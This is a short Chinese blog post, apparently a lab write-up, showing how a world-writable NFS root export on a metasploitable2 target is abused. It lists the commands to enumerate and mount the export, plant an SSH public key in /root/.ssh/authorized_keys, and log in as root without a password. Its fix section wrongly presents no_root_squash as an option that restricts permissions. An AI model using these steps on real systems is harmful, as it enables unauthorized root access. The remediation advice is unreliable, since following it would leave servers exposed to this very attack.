Linux NFS共享目录配置漏洞

漏洞描述

NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。

靶场环境

metasploitable2

靶机IP:192.168.211.141

漏洞复现

假定目标提供nfs共享目录,输入命令探测

rpcinfo 192.168.211.141

输入showmount -e 192.168.211.141查看共享目录

设置一个ssh秘钥

输入命令挂载靶机目录,挂载位置为自己设置的文件夹

mount -t nfs 192.168.211.141:/root /mnt/nfs

ls查看是否挂载成功

输入命令将公钥复制到目标靶机固定位置

cp /root/.ssh/id_rsa.pub /mnt/nfs/.ssh/authorized_keys

ssh连接靶机,输入刚才设置的秘钥,连接成功

修复方式

针对Linux NFS共享目录配置漏洞,修复方法包括更新软件版本、配置防火墙以限制访问、禁用不必要的服务、使用安全选项如no_root_squash以限制权限、启用日志记录以监控异常行为、考虑加密通信如NFSv4和Kerberos认证,并定期审查安全策略以保持系统安全性。这些措施有助于降低潜在攻击面,提高NFS共享目录的安全性。

暂无评论

发送评论 编辑评论


				
上一篇
下一篇